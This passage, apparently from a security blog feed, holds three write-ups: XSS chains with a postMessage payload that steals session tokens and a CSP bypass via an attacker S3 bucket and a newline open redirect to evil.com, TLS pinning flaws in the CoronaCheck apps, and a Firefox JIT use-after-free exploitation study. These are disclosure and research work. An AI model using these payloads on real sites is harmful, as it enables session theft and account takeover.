Thus, by sending the PostMessage to trigger an XSS on https://abc.cloudfront.net/iframe_chat.html, the XSS would then run arbitrary JavaScript that sent another PostMessage from https://abc.cloudfront.net/iframe_chat.html to https://feedback.companyA.com/ which would leak the session token.

Based on this, I modified the XSS payload:

{
    "versionNumber": "2",
    "config": "a;window.addEventListener(`message`, (event) => {alert(JSON.stringify(event.data))});parent.postMessage({type:`IframeLoaded`},`*`)//",
    "configs": {
        "a": "a
    }
}

The XSS received the session data from the parent iFrame on https://feedback.companyA.com/ and exfiltrated the stolen sessionToken to an attacker-controlled server (I simply used alert here).

Puzzle B: Bypassing CSP with Newline Open Redirect

While exploring the OAuth flow of Company B, I noticed something strange about its OAuth authorization page. Typically, OAuth authorization pages present some kind of confirmation button to link an account. For example, here's Twitter's OAuth authorization page to login to GitLab:

OAuth Login

Company B's page used a URL with the following format: https://accept.companyb/confirmation?domain=oauth.companyb.com&state=<STATE>&client=<CLIENT ID>. Once the page was loaded, it would dynamically send a GET request to oauth.companyb.com/oauth_data?clientID=<CLIENT ID>. This returned some data to populate the page's contents:

{
    "app": {
        "logoUrl": <PAGE LOGO URL>,
        "name": <NAME>,
        "link": <URL> ,
        "introduction": "A cool app!"
        ...
    }
}

By playing around with this response data, I realised that introduction was injected into the page without any sanitisation. If I could control the destination of the GET request and subsequently the response, it would be possible to cause an XSS.

Fortunately, it appeared that the domain parameter allowed me to control the domain of the GET request. However, when I set this to my own domain, the request failed to execute and raised a Content Security Policy (CSP) error. I quickly checked the CSP of the page:

Content-Security-Policy: default-src 'self' 'unsafe-inline' *.companyb.com *.amazonaws.com; script-src 'self' https: *.companyb.com; object-src 'none';

Dynamic HTTP requests adhere to the connect-src CSP directive; since none was specified here, they fell back to default-src, which meant that only requests to 'self', *.companyb.com, and *.amazonaws.com were allowed. Unfortunately for the company, *.amazonaws.com created a big loophole: since AWS S3 files are hosted on *.s3.amazonaws.com, I could still send requests to my attacker-controlled bucket! Furthermore, CORS would not be an issue, as AWS allows users to set the CORS policies of buckets.
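Since the attacker owns the bucket, its CORS policy can simply be opened up to any origin. A permissive S3 CORS configuration along these lines (illustrative) is all that is needed:

[
    {
        "AllowedHeaders": ["*"],
        "AllowedMethods": ["GET"],
        "AllowedOrigins": ["*"],
        "ExposeHeaders": []
    }
]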

I quickly hosted a JSON file with <script>alert()</script> as the introduction text on https://myevilbucket.s3.amazonaws.com/payload.json, then browsed to https://accept.companyb/confirmation?domain=myevilbucket.s3.amazonaws.com%2fpayload.json%3F&state=<STATE>&client=<CLIENT ID>. The page successfully requested my file at https://myevilbucket.s3.amazonaws.com/payload.json?/oauth_data?clientID=<CLIENT ID>, then... nothing.

One more problem remained: the script-src CSP directive only allowed self or *.companyb.com over HTTPS. Luckily, I had an open redirect on t.companyb.com saved for such situations. The vulnerable endpoint would redirect to the value of the url parameter but validated that the parameter ended in companyb.com. However, it allowed a newline character %0A in the subdomain section, which would be truncated by browsers, such that http://t.companyb.com/redirect?url=http%3A%2F%2Fevil.com%0A.companyb.com%2F actually redirected to https://evil.com/%0A.companyb.com/ instead.

Using this bypass as an open redirect, I saved my final XSS payload as a file named <NEWLINE CHARACTER>.companyb.com in my web server's document root. I then injected a script tag with src pointing to the open redirect, which passed the CSP but eventually redirected to the final payload.

Diagram 2

Conclusion

Both companies awarded bonuses for my XSS reports due to their complexity and ability to bypass hardened execution environments. I hope that by documenting my thought processes, you can also gain a few extra tips to solve DOM XSS puzzles.

CoronaCheck App TLS certificate vulnerabilities

3 February 2022 at 00:00

During the pandemic a lot of software has seen an explosive growth of active users, such as the software used for working from home. In addition, completely new applications have been developed to track and handle the pandemic, like those for Bluetooth-based contact tracing. These projects have been a focus of our research recently. With projects growing this quickly or with a quick deadline for release, security is often not given the required attention. It is therefore very useful to contribute some research time to improve the security of the applications all of us suddenly depend on. Previously, we have found vulnerabilities in Zoom and Proctorio. This blog post will detail some vulnerabilities in the Dutch CoronaCheck app we found and reported. These vulnerabilities are related to the security of the connections used by the app and were difficult to exploit in practice. However, it is a little worrying to find this many vulnerabilities in an app for which security is of such critical importance.

Background

The CoronaCheck app can be used to generate a QR code proving that the user has received either a COVID-19 vaccination, has recently received a negative test result or has recovered from COVID-19. A separate app, the CoronaCheck Verifier, can be used to check these QR codes. These apps are used to give access to certain locations or events, which is known in The Netherlands as “Testen voor Toegang”. They may also be required for traveling to specific countries. The app used to generate the QR code is referred to in the codebase as the Holder app, to distinguish it from the Verifier app. The source code of these apps is available on GitHub, although active development takes place in a separate non-public repository. At certain intervals, the public source code is updated from the private repository.

The Holder app:

The Verifier app:

The verification of the QR codes uses two different methods, depending on whether the code is for use in The Netherlands or internationally. The cryptographic process is very different for each. We spent a bit of time looking at these two processes, but found no (obvious) vulnerabilities.

Then we looked at the verification of the connections set up by the two apps. Part of the configuration of the app needs to be downloaded from a server hosted by the Ministerie van Volksgezondheid, Welzijn en Sport (VWS), because test results are retrieved by the app directly from the test provider. This means that the Holder app needs to know which test providers are currently in use and how to connect to them, and the Verifier app needs to know which keys to use to verify the signatures for each test provider. The privacy aspects of this design are quite good: the test provider only knows that the user retrieved the result, but not where they use it; VWS doesn't know who has taken a test or their result; and the Verifier only sees the limited personal information in the QR code that is needed to check the identity of the holder. The downside of this design is that blocking a specific person's QR code is difficult.

Strict requirements were formulated for the security of these connections in the design. See here (in Dutch). This includes the use of certificate pinning to check that the certificates are issued by a small set of Certificate Authorities (CAs). In addition to the use of TLS, all responses from the APIs must be signed; this uses the PKCS#7 Cryptographic Message Syntax (CMS) format.

Many of the checks on certificates that were added in the iOS app contained subtle mistakes. Combined, only one implicit check on the certificate (performed by App Transport Security) was still effective. This meant that there was no certificate pinning at all and any malicious CA could generate a certificate capable of intercepting the connections between the app and VWS or a test provider.

Certificate check issues

An iOS app that wants to handle the checking of TLS certificates itself can do so by implementing the delegate method urlSession(_:didReceive:completionHandler:). Whenever a new connection is created, this method is called allowing the app to perform its own checks. It can respond in three different ways: continue with the usual validation (performDefaultHandling), accept the certificate (useCredential) or reject the certificate (cancelAuthenticationChallenge). This function can also be called for other authentication challenges, such as HTTP basic authentication, so it is common to check that the type is NSURLAuthenticationMethodServerTrust first.

This was implemented as follows in SecurityStrategy.swift lines 203 to 262:

203 func checkSSL() {
204
205    guard challenge.protectionSpace.authenticationMethod == NSURLAuthenticationMethodServerTrust,
206          let serverTrust = challenge.protectionSpace.serverTrust else {
207
208        logDebug("No security strategy")
209        completionHandler(.performDefaultHandling, nil)
210        return
211    }
212
213    let policies = [SecPolicyCreateSSL(true, challenge.protectionSpace.host as CFString)]
214    SecTrustSetPolicies(serverTrust, policies as CFTypeRef)
215    let certificateCount = SecTrustGetCertificateCount(serverTrust)
216
217    var foundValidCertificate = false
218    var foundValidCommonNameEndsWithTrustedName = false
219    var foundValidFullyQualifiedDomainName = false
220
221    for index in 0 ..< certificateCount {
222
223        if let serverCertificate = SecTrustGetCertificateAtIndex(serverTrust, index) {
224            let serverCert = Certificate(certificate: serverCertificate)
225
226            if let name = serverCert.commonName {
227                if name.lowercased() == challenge.protectionSpace.host.lowercased() {
228                    foundValidFullyQualifiedDomainName = true
229                    logVerbose("Host matched CN \(name)")
230                }
231                for trustedName in trustedNames {
232                    if name.lowercased().hasSuffix(trustedName.lowercased()) {
233                        foundValidCommonNameEndsWithTrustedName = true
234                        logVerbose("Found a valid name \(name)")
235                    }
236                }
237            }
238            if let san = openssl.getSubjectAlternativeName(serverCert.data), !foundValidFullyQualifiedDomainName {
239                if compareSan(san, name: challenge.protectionSpace.host.lowercased()) {
240                    foundValidFullyQualifiedDomainName = true
241                    logVerbose("Host matched SAN \(san)")
242                }
243            }
244            for trustedCertificate in trustedCertificates {
245
246                if openssl.compare(serverCert.data, withTrustedCertificate: trustedCertificate) {
247                    logVerbose("Found a match with a trusted Certificate")
248                    foundValidCertificate = true
249                }
250            }
251        }
252    }
253
254    if foundValidCertificate && foundValidCommonNameEndsWithTrustedName && foundValidFullyQualifiedDomainName {
255        // all good
256        logVerbose("Certificate signature is good for \(challenge.protectionSpace.host)")
257        completionHandler(.useCredential, URLCredential(trust: serverTrust))
258    } else {
259        logError("Invalid server trust")
260        completionHandler(.cancelAuthenticationChallenge, nil)
261    }
262 }

If an app wants to implement additional verification checks, it is common to start by performing the platform's own certificate validation. This also means that the certificate chain is resolved: the certificates received from the server may be incomplete or contain additional certificates, and by applying the platform verification a chain is constructed ending in a trusted root (if possible). An app that uses a private root could also do this, but with the root added as the only trust anchor.

This leads to the first issue with the handling of certificate validation in the CoronaCheck app: instead of giving the “continue with the usual validation” result, the app would accept the certificate if its own checks passed (line 257). This meant that the checks were not additions to the verification, but replaced it completely. The app does implicitly perform the platform verification to obtain the correct chain (line 215), but the result code of that validation was not checked, so an untrusted certificate was not rejected here.

The app performs 3 additional checks on the certificate:

  • It is issued by one of a list of root certificates (line 246).
  • It contains a Subject Alternative Name containing a specific domain (line 238).
  • It contains a Common Name containing a specific domain (lines 227 and 232).

For checking the root certificate the resolved chain is used and each certificate is compared to a list of certificates hard-coded in the app. This set of roots depends on what type of connection it is. Connections to the test providers are a bit more lenient, while the connection to the VWS servers itself needs to be issued by a specific root.

This check had a critical issue: the comparison was not based on unforgeable data. Comparing certificates properly could be done by comparing them byte by byte; certificates are not very large, so this comparison would be fast enough. Another option would be to generate a hash of both certificates and compare those, which could speed up repeated checks for the same certificate. The implemented comparison of the root certificate was instead based on two checks: comparing the serial number and comparing the “authority key information” extension fields. For trusted certificates, the serial number must be randomly generated by the CA. The authority key information field is usually a hash of the issuer's key, but it can be any data. It is trivial to generate a self-signed certificate with the same serial number and authority key information field as an existing certificate. Combine this with the previous item, and it is possible to generate a new, self-signed certificate that is accepted by the TLS verification of the app.

OpenSSL.m lines 144 to 227:

144 - (BOOL)compare:(NSData *)certificateData withTrustedCertificate:(NSData *)trustedCertificateData {
145
146	BOOL subjectKeyMatches = [self compareSubjectKeyIdentifier:certificateData with:trustedCertificateData];
147	BOOL serialNumbersMatches = [self compareSerialNumber:certificateData with:trustedCertificateData];
148	return subjectKeyMatches && serialNumbersMatches;
149 }
150
151 - (BOOL)compareSubjectKeyIdentifier:(NSData *)certificateData with:(NSData *)trustedCertificateData {
152
153	const ASN1_OCTET_STRING *trustedCertificateSubjectKeyIdentifier = NULL;
154	const ASN1_OCTET_STRING *certificateSubjectKeyIdentifier = NULL;
155	BIO *certificateBlob = NULL;
156	X509 *certificate = NULL;
157	BIO *trustedCertificateBlob = NULL;
158	X509 *trustedCertificate = NULL;
159	BOOL isMatch = NO;
160
161	if (NULL  == (certificateBlob = BIO_new_mem_buf(certificateData.bytes, (int)certificateData.length)))
162		EXITOUT("Cannot allocate certificateBlob");
163
164	if (NULL == (certificate = PEM_read_bio_X509(certificateBlob, NULL, 0, NULL)))
165		EXITOUT("Cannot parse certificateData");
166
167	if (NULL  == (trustedCertificateBlob = BIO_new_mem_buf(trustedCertificateData.bytes, (int)trustedCertificateData.length)))
168		EXITOUT("Cannot allocate trustedCertificateBlob");
169
170	if (NULL == (trustedCertificate = PEM_read_bio_X509(trustedCertificateBlob, NULL, 0, NULL)))
171		EXITOUT("Cannot parse trustedCertificate");
172
173	if (NULL == (trustedCertificateSubjectKeyIdentifier = X509_get0_subject_key_id(trustedCertificate)))
174		EXITOUT("Cannot extract trustedCertificateSubjectKeyIdentifier");
175
176	if (NULL == (certificateSubjectKeyIdentifier = X509_get0_subject_key_id(certificate)))
177		EXITOUT("Cannot extract certificateSubjectKeyIdentifier");
178
179	isMatch = ASN1_OCTET_STRING_cmp(trustedCertificateSubjectKeyIdentifier, certificateSubjectKeyIdentifier) == 0;
180
181 errit:
182	BIO_free(certificateBlob);
183	BIO_free(trustedCertificateBlob);
184	X509_free(certificate);
185	X509_free(trustedCertificate);
186
187	return isMatch;
188 }
189
190 - (BOOL)compareSerialNumber:(NSData *)certificateData with:(NSData *)trustedCertificateData {
191
192	BIO *certificateBlob = NULL;
193	X509 *certificate = NULL;
194	BIO *trustedCertificateBlob = NULL;
195	X509 *trustedCertificate = NULL;
196	ASN1_INTEGER *certificateSerial = NULL;
197	ASN1_INTEGER *trustedCertificateSerial = NULL;
198	BOOL isMatch = NO;
199
200	if (NULL  == (certificateBlob = BIO_new_mem_buf(certificateData.bytes, (int)certificateData.length)))
201		EXITOUT("Cannot allocate certificateBlob");
202
203	if (NULL == (certificate = PEM_read_bio_X509(certificateBlob, NULL, 0, NULL)))
204		EXITOUT("Cannot parse certificate");
205
206	if (NULL  == (trustedCertificateBlob = BIO_new_mem_buf(trustedCertificateData.bytes, (int)trustedCertificateData.length)))
207		EXITOUT("Cannot allocate trustedCertificateBlob");
208
209	if (NULL == (trustedCertificate = PEM_read_bio_X509(trustedCertificateBlob, NULL, 0, NULL)))
210		EXITOUT("Cannot parse trustedCertificate");
211
212	if (NULL == (certificateSerial = X509_get_serialNumber(certificate)))
213		EXITOUT("Cannot parse certificateSerial");
214
215	if (NULL == (trustedCertificateSerial = X509_get_serialNumber(trustedCertificate)))
216		EXITOUT("Cannot parse trustedCertificateSerial");
217
218	isMatch = ASN1_INTEGER_cmp(certificateSerial, trustedCertificateSerial) == 0;
219
220 errit:
221	if (certificateBlob) BIO_free(certificateBlob);
222	if (trustedCertificateBlob) BIO_free(trustedCertificateBlob);
223	if (certificate) X509_free(certificate);
224	if (trustedCertificate) X509_free(trustedCertificate);
225
226	return isMatch;
227 }
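For contrast, a comparison based on unforgeable data is small. Here is a minimal sketch of the idea, written in JavaScript (Node.js) for brevity; it is illustrative only and not the app's code:

const crypto = require("crypto");

// Identify a pinned certificate by the SHA-256 digest of its raw DER bytes.
// Unlike the serial number and authority key identifier, the full certificate
// contents cannot be forged without finding a hash collision.
function matchesPinnedCertificate(presentedDer, pinnedSha256Hex) {
    const digest = crypto.createHash("sha256").update(presentedDer).digest("hex");
    return digest === pinnedSha256Hex;
}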

This combination of issues may sound like TLS validation was completely broken, but luckily there was a safety net. In iOS 9, Apple introduced a mechanism called App Transport Security (ATS) to enforce certificate validation on connections. This is used to enforce the use of secure and trusted HTTPS connections. If an app wants to use an insecure connection (either plain HTTP or HTTPS with certificates not issued by a trusted root), it needs to specifically opt-in to that in its Info.plist file. This creates something of a safety net, making it harder to accidentally disable TLS certificate validation due to programming mistakes.

ATS was enabled for the CoronaCheck apps without any exceptions. This meant that our untrusted certificate, even though accepted by the app itself, was rejected by ATS, so we couldn't completely bypass the certificate validation. It could, however, still be exploitable in these scenarios:

  • A future update for the app could add an ATS exception or an update to iOS might change the ATS rules. Adding an ATS exception is not as unrealistic as it may sound: the app contains a trusted root that is not included in the iOS trust store (“Staat der Nederlanden Private Root CA - G1”). To actually use that root would require an ATS exception.
  • A malicious CA could issue a certificate using the serial number and authority key information of one of the trusted certificates. This certificate would be accepted by ATS and pass all checks. A reliable CA would not issue such a certificate, but it does mean that the certificate pinning that was part of the requirements was not effective.

Other issues

We found a number of other issues in the verification of certificates. These are of lower impact.

Subject Alternative Names

In the past, the Common Name field was used to indicate for which domain a certificate was for. This was inflexible, because it meant each certificate was only valid for one domain. The Subject Alternative Name (SAN) extension was added to make it possible to add more domain names (or other types of names) to certificates. To correctly verify if a certificate is valid for a domain, the SAN extension has to be checked.

Obtaining the SANs from a certificate was implemented by using OpenSSL to generate a human-readable representation of the SAN extension and then parsing that. This did not take into account the possibility of name types other than a domain name, such as an email address in a certificate used for S/MIME. The parsing could be confused using specifically formatted email addresses to make it match any domain name.

SecurityStrategy.swift lines 114 to 127:

114 func compareSan(_ san: String, name: String) -> Bool {
115
116    let sanNames = san.split(separator: ",")
117    for sanName in sanNames {
118        // SanName can be like DNS: *.domain.nl
119        let pattern = String(sanName)
120            .replacingOccurrences(of: "DNS:", with: "", options: .caseInsensitive)
121            .trimmingCharacters(in: .whitespacesAndNewlines)
122        if wildcardMatch(name, pattern: pattern) {
123            return true
124        }
125    }
126    return false
127 }

For example, an S/MIME certificate containing the email address "a,*,b"@example.com (which is a valid email address) would result in a wildcard domain (*) that matches all hosts.
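The flawed parsing is easy to demonstrate by re-implementing it; the following is a JavaScript approximation of the Swift code above, and the exact human-readable SAN string is an assumption:

// The human-readable SAN representation is split on commas, so the quoted
// local part of the email address produces a bare "*" entry
const san = 'email:"a,*,b"@example.com';
const patterns = san.split(",").map(function (s) {
    return s.replace(/DNS:/gi, "").trim();
});
console.log(patterns); // [ 'email:"a', '*', 'b"@example.com' ]
// The middle entry is a wildcard pattern that matches any host name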

CMS signatures

The domain name check for the certificate used to generate the CMS signature of the response did not compare the full domain name; instead, it checked that a specific string occurred in the domain (coronacheck.nl) and that it ended with a specific string (.nl). This means that an attacker with a certificate for coronacheck.nl.example.nl could also CMS-sign API responses.

OpenSSL.m lines 259 to 278:

259 - (BOOL)validateCommonNameForCertificate:(X509 *)certificate
260                         requiredContent:(NSString *)requiredContent
261                          requiredSuffix:(NSString *)requiredSuffix {
262    
263    // Get subject from certificate
264    X509_NAME *certificateSubjectName = X509_get_subject_name(certificate);
265    
266    // Get Common Name from certificate subject
267    char certificateCommonName[256];
268    X509_NAME_get_text_by_NID(certificateSubjectName, NID_commonName, certificateCommonName, 256);
269    NSString *cnString = [NSString stringWithUTF8String:certificateCommonName];
270    
271    // Compare Common Name to required content and required suffix
272    BOOL containsRequiredContent = [cnString rangeOfString:requiredContent options:NSCaseInsensitiveSearch].location != NSNotFound;
273    BOOL hasCorrectSuffix = [cnString hasSuffix:requiredSuffix];
274    
275    certificateSubjectName = NULL;
276    
277    return hasCorrectSuffix && containsRequiredContent;
278 }
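Reduced to its essence, the check combines a substring match with a suffix match, which a crafted domain satisfies trivially (illustrative JavaScript):

const cn = "coronacheck.nl.example.nl";
const containsRequiredContent = cn.includes("coronacheck.nl"); // true
const hasCorrectSuffix = cn.endsWith(".nl");                   // true
console.log(containsRequiredContent && hasCorrectSuffix);      // true, yet this is example.nl's domain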

The only issue we found in the Android implementation is similar: the check for the CMS signature used a regex to check the name of the signing certificate. This regex was not bound on the right, making it also possible to bypass it using coronacheck.nl.example.com.

SignatureValidator.kt lines 94 to 96:

94 fun cnMatching(substring: String): Builder {
95    return cnMatching(Regex(Regex.escape(substring)))
96 }

SignatureValidator.kt lines 142 to 149:

if (cnMatchingRegex != null) {
    if (!JcaX509CertificateHolder(signingCertificate).subject.getRDNs(BCStyle.CN).any {
            val cn = IETFUtils.valueToString(it.first.value)
            cnMatchingRegex.containsMatchIn(cn)
        }) {
        throw SignatureValidationException("Signing certificate does not match expected CN")
    }
}

Because these certificates had to be issued under PKI-Overheid (a CA run by the Dutch government), it might not have been easy to obtain a certificate with such a domain name.

Race condition

We also found a race condition in the application of the certificate validation rules. As we mentioned, the rules the app applied for certificate validation were stricter for VWS connections than for connections to test providers, and even for connections to VWS there were different levels of strictness. However, if two requests were performed in quick succession, the first request could be validated based on the verification rules specified for the second request. In practice, the least strict verification rules still require a valid certificate, so this could not be used to intercept connections either. However, it was already triggering in normal use, as the app was initiating two requests with different validation rules immediately after starting.

Reporting

We reported these vulnerabilities to the email address on the “Kwetsbaarheid melden” (Report a vulnerability) page on June 30th, 2021. This email bounced because the address did not exist. We had to reach out through other channels to find a working address. We received an acknowledgement that the message was received, but no further updates. The vulnerabilities were fixed quietly, without letting us know that they were fixed.

In October we decided to look at the code on GitHub to check if all issues were resolved correctly. While most issues were fixed, one was not fixed properly. We sent another email detailing this issue. This was again fixed without informing us.

Developers are of course not required to keep us in the loop when we report a vulnerability, but this does show that if they had, we could have caught the incorrect fix much earlier.

Recommendation

TLS certificate validation is a complex process. This case demonstrates that adding more checks is not always better, because they might interfere with the normal platform certificate validation. We recommend changing the certificate validation process only if absolutely necessary. Any extra checks should have a clear security goal. Checks such as “the domain must contain the string …” (instead of “must end with …”) have no security benefit and should be avoided.

Certificate pinning not only has implementation challenges, but also operational challenges. If a certificate renewal has not been properly planned, then it may leave an app unable to connect. This is why we usually recommend pinning only for applications handling very sensitive user data. Other checks can be implemented to address the risk of a malicious or compromised CA with much less chance of problems, for example checking the revocation and Certificate Transparency status of a certificate.

Conclusion

We found and reported a number of issues in the verification of TLS certificates used for the connections of the Dutch CoronaCheck apps. These vulnerabilities could have been combined to bypass certificate pinning in the app. In most cases, this could only be abused by a compromised or malicious CA, or if a specific CA could be used to issue a certificate for a certain domain. These vulnerabilities have since been fixed.

Firefox JIT Use-After-Frees | Exploiting CVE-2020-26950

3 February 2022 at 16:30

Executive Summary

  • SentinelLabs worked on examining and exploiting a previously patched vulnerability in the Firefox just-in-time (JIT) engine, enabling a greater understanding of the ways in which this class of vulnerability can be used by an attacker.
  • In the process, we identified unique ways of constructing exploit primitives by using function arguments to show how a creative attacker can utilize parts of their target not seen in previous exploits to obtain code execution.
  • Additionally, we worked on developing a CodeQL query to identify whether there were any similar vulnerabilities that shared this pattern.

Introduction

At SentinelLabs, we often look into various complicated vulnerabilities and how they’re exploited in order to understand how best to protect customers from different types of threats.

CVE-2020-26950 is one of the more interesting Firefox vulnerabilities to be fixed. Discovered by the 360 ESG Vulnerability Research Institute, it targets the now-replaced JIT engine used in Spidermonkey, called IonMonkey.

Within a month of this vulnerability being found in late 2020, the area of the codebase that contained the vulnerability had become deprecated in favour of the new WarpMonkey engine.

What makes this vulnerability interesting is the number of constraints involved in exploiting it, to the point that I ended up constructing some previously unseen exploit primitives. By knowing how to exploit these types of unique bugs, we can work towards ensuring we detect all the ways in which they can be exploited.

Just-in-Time (JIT) Engines

When people think of web browsers, they generally think of HTML, JavaScript, and CSS. In the days of Internet Explorer 6, it certainly wasn’t uncommon for web pages to hang or crash. JavaScript, being the complicated high-level language that it is, was not particularly useful for fast applications and improvements to allocators, lazy generation, and garbage collection simply wasn’t enough to make it so. Fast forward to 2008 and Mozilla and Google both released their first JIT engines for JavaScript.

JIT is a way for interpreted languages to be compiled into assembly while the program is running. In the case of JavaScript, this means that a function such as:

function add() {
	return 1+1;
}

can be replaced with assembly such as:

push    rbp
mov     rbp, rsp
mov     eax, 2
pop     rbp
ret

This is important because originally the function would be executed using JavaScript bytecode within the JavaScript Virtual Machine, which compared to assembly language, is significantly slower.

Since JIT compilation is quite a slow process due to the huge amount of heuristics that take place (such as constant folding, as shown above when 1+1 was folded to 2), only those functions that would truly benefit from being JIT compiled are. Functions that are run a lot (think 10,000 times or so) are ideal candidates and are going to make page loading significantly faster, even with the tradeoff of JIT compilation time.

Redundancy Elimination

Something that is key to this vulnerability is the concept of eliminating redundant nodes. Take the following code:

function read(i) {
	if (i 

This would start as the following JIT pseudocode:

1. Guard that argument 'i' is an Int32 or fallback to Interpreter
2. Get value of 'i'
3. Compare GetValue2 to 10
4. If LessThan, goto 8
5. Get value of 'i'
6. Add 2 to GetValue5
7. Return Int32 Add6
8. Get value of 'i'
9. Add 1 to GetValue8
10. Return Add9 as an Int32

In this, we see that we get the value of argument i multiple times throughout this code. Since the value is never set in the function and only read, having multiple GetValue nodes is redundant since only one is required. JIT Compilers will identify this and reduce it to the following:

1. Guard that argument 'i' is an Int32 or fallback to Interpreter
2. Get value of 'i'
3. Compare GetValue2 to 10
4. If LessThan, goto 8
5. Add 2 to GetValue2
6. Return Int32 Add5
7. Add 1 to GetValue2
8. Return Add7 as an Int32

CVE-2020-26950 exploits a flaw in this kind of assumption.

IonMonkey 101

How IonMonkey works is a topic that has been covered in detail several times before. In the interest of keeping this section brief, I will give a quick overview of the IonMonkey internals. If you have a greater interest in diving deeper into the internals, the linked articles above are a must-read.

JavaScript doesn’t immediately get translated into assembly language. There are a bunch of steps that take place first. Between bytecode and assembly, code is translated into several other representations. One of these is called Middle-Level Intermediate Representation (MIR). This representation is used in Control-Flow Graphs (CFGs) that make it easier to perform compiler optimisations on.

Some examples of MIR nodes are:

  • MGuardShape - Checks that the object has a particular shape (The structure that defines the property names an object has, as well as their offset in the property array, known as the slots array) and falls back to the interpreter if not. This is important since JIT code is intended to be fast and so needs to assume the structure of an object in memory and access specific offsets to reach particular properties.
  • MCallGetProperty - Fetches a given property from an object.

Each of these nodes has an associated Alias Set that describes whether they Load or Store data, and what type of data they handle. This helps MIR nodes define what other nodes they depend on and also which nodes are redundant. For example, a node that reads a property will depend on either the first node in the graph or the most recent node that writes to the property.

In the context of the GetValue pseudocode above, these would have a Load Alias Set since they are loading rather than storing values. Since there are no Store nodes between them that affect the variable they’re loading from, they would have the same dependency. Since they are the same node and have the same dependency, they can be eliminated.

If, however, the variable were to be written to before the second GetValue node, then it would depend on this Store instead and will not be removed due to depending on a different node. In this case, the GetValue node is Aliasing with the node that writes to the variable.

The Vulnerability

With open-source software such as Firefox, understanding a vulnerability often starts with the patch. The Mozilla Security Advisory states:

CVE-2020-26950: Write side effects in MCallGetProperty opcode not accounted for
In certain circumstances, the MCallGetProperty opcode can be emitted with unmet assumptions resulting in an exploitable use-after-free condition.

The critical part of the patch is in IonBuilder::createThisScripted as follows:

IonBuilder::createThisScripted patch

To summarise, the code would originally try to fetch the object prototype from the Inline Cache using the MGetPropertyCache node (Lines 5170 to 5175). If doing so causes a bailout, it will next switch to getting the prototype by generating a MCallGetProperty node instead (Lines 5177 to 5180).

After this fix, the MCallGetProperty node is no longer generated upon bailout. This alone would likely cause a bailout loop, whereby the MGetPropertyCache node is used, a bailout occurs, then the JIT gets regenerated with the exact same nodes, which then causes the same bailout to happen (See: Definition of insanity).

The patch, however, has added some code to IonGetPropertyIC::update that prevents this loop from happening by disabling IonMonkey entirely for this script if the MGetPropertyCache node fails for JSFunction object types:

IonBuilder code to prevent a bailout-loop

So the question is, what’s so bad about the MCallGetProperty node?

Looking at the code, it’s clear that when the node is idempotent, as set on line 5179, the Alias Set is a Load type, which means that it will never store anything:

Alias Set when idempotent is true

This isn’t entirely correct. In the patch, the line of code that disables Ion for the script is only run for JSFunction objects when fetching the prototype property, which is exactly what IonBuilder::createThisScripted is doing, but for all objects.

From this, we can conclude that this is an edge case where JSFunction objects have a write side effect that is triggered by the MCallGetProperty node.

Lazy Properties

One of the ways that JavaScript engines improve their performance is to not generate things if not absolutely necessary. For example, if a function is created and is never run, parsing it to bytecode would be a waste of resources that could be spent elsewhere. This last-minute creation is a concept called laziness, and JSFunction objects perform lazy property resolution for their prototypes.

When the MCallGetProperty node is converted to an LCallGetProperty node and is then turned to assembly using the Code Generator, the resulting code makes a call back to the engine function GetValueProperty. After a series of other function calls, it reaches the function LookupOwnPropertyInline. If the property name is not found in the object shape, then the object class’ resolve hook is called.

Calling the resolve hook

The resolve hook is a function specified by object classes to generate lazy properties. It’s one of several class operations that can be specified:

The JSClassOps struct

In the case of the JSFunction object type, the function fun_resolve is used as the resolve hook.

The property name ID is checked against the prototype property name. If it matches and the JSFunction object still needs a prototype property to be generated, then it executes the ResolveInterpretedFunctionPrototype function:

The ResolveInterpretedFunctionPrototype function

This function then calls DefineDataProperty to define the prototype property, add the prototype name to the object shape, and write it to the object slots array. Therefore, although the node is supposed to only Load a value, it has ended up acting as a Store.

The issue becomes clear when considering two objects allocated next to each other:

If the first object were to have a new property added, there’s no space left in the slots array, which would cause it to be reallocated, as so:

In terms of JIT nodes, if we were to get two properties called x and y from an object called o, it would generate the following nodes:

1. GuardShape of object 'o'
2. Slots of object 'o'
3. LoadDynamicSlot 'x' from slots2
4. GuardShape of object 'o'
5. Slots of object 'o'
6. LoadDynamicSlot 'y' from slots5

Thinking back to the redundancy elimination, if properties x and y are both non-getter properties, there’s no way to change the shape of the object o, so we only need to guard the shape once and get the slots array location once, reducing it to this:

1. GuardShape of object 'o'
2. Slots of object 'o'
3. LoadDynamicSlot 'x' from slots2
4. LoadDynamicSlot 'y' from slots2

Now, if object o is a JSFunction and we can trigger the vulnerability above between the two, the location of the slots array has now changed, but the second LoadDynamicSlot node will still be using the old location, resulting in a use-after-free:

Use-after-free

The final piece of the puzzle is how the function IonBuilder::createThisScripted is called. It turns out that up a chain of calls, it originates from the jsop_call function. Despite the name, it isn’t just called when generating the MIR node for JSOp::Call, but also several other nodes:

The vulnerable code path will also only be taken if the second argument (constructing) is true. This means that the only opcodes that can reach the vulnerability are JSOp::New and JSOp::SuperCall.
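In source terms, these two opcodes correspond to the ordinary construction forms (a minimal illustration):

function f() {}
new f();                         // compiles to JSOp::New

class Child extends f {
    constructor() { super(); }   // compiles to JSOp::SuperCall
}
new Child();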

Variant Analysis

In order to look at any possible variations of this vulnerability, Firefox was compiled using CodeQL and a query was written for the bug.

import cpp
 
// Find all C++ VM functions that can be called from JIT code
class VMFunction extends Function {
   VMFunction() {
       this.getAnAccess().getEnclosingVariable().getName() = "vmFunctionTargets"
   }
}
 
// Get a string representation of the function path to a given function (resolveConstructor/DefineDataProperty)
// depth - to avoid going too far with recursion
string tracePropDef(int depth, Function f) {
   depth in [0 .. 16] and
   exists(FunctionCall fc | fc.getEnclosingFunction() = f and ((fc.getTarget().getName() = "DefineDataProperty" and result = f.getName().toString()) or (not fc.getTarget().getName() = "DefineDataProperty" and result = tracePropDef(depth + 1, fc.getTarget()) + " -> " + f.getName().toString())))
}
 
// Trace a function call to one that starts with 'visit' (CodeGenerator uses visit, so we can match against MIR with M)
// depth - to avoid going too far with recursion
Function traceVisit(int depth, Function f) {
   depth in [0 .. 16] and
   exists(FunctionCall fc | (f.getName().matches("visit%") and result = f)or (fc.getTarget() = f and result = traceVisit(depth + 1, fc.getEnclosingFunction())))
}
 
// Find the AliasSet of a given MIR node by tracing from inheritance.
Function alias(Class c) {
   (result = c.getAMemberFunction() and result.getName().matches("%getAlias%")) or (result = alias(c.getABaseClass()))
}
 
// Matches AliasSet::Store(), AliasSet::Load(), AliasSet::None(), and AliasSet::All()
class AliasSetFunc extends Function {
   AliasSetFunc() {
